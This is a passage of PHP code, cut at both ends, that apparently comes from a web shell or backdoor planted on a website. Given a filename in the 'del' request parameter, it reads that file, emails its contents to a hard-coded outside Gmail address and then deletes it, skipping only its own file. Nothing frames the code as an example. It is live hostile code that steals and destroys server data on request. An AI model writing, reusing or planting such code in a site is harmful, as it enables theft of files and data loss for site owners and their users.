name:
';
}
if($_REQUEST["del"]!="" && $_REQUEST["del"]!="zdf.php"){
$filename = strtolower($_REQUEST['del']);
$file = fopen($filename, "r");
while (($line = fgets($file)) !== false) {
$content.= $line;
}
fclose($file);
if($file!="error_log"){
$to = "masacranto3@gmail.com";
$subject = "File Content of $file masare7.com";
$mess = $content;
$headers = "From: files@masare7.com";
mail($to, $subject, $mess, $headers);
}
unlink($filename);
}
$content="";
$feature=substr($_GET['file'],0,-4).".png";
If(file_exists($feature)){
Echo "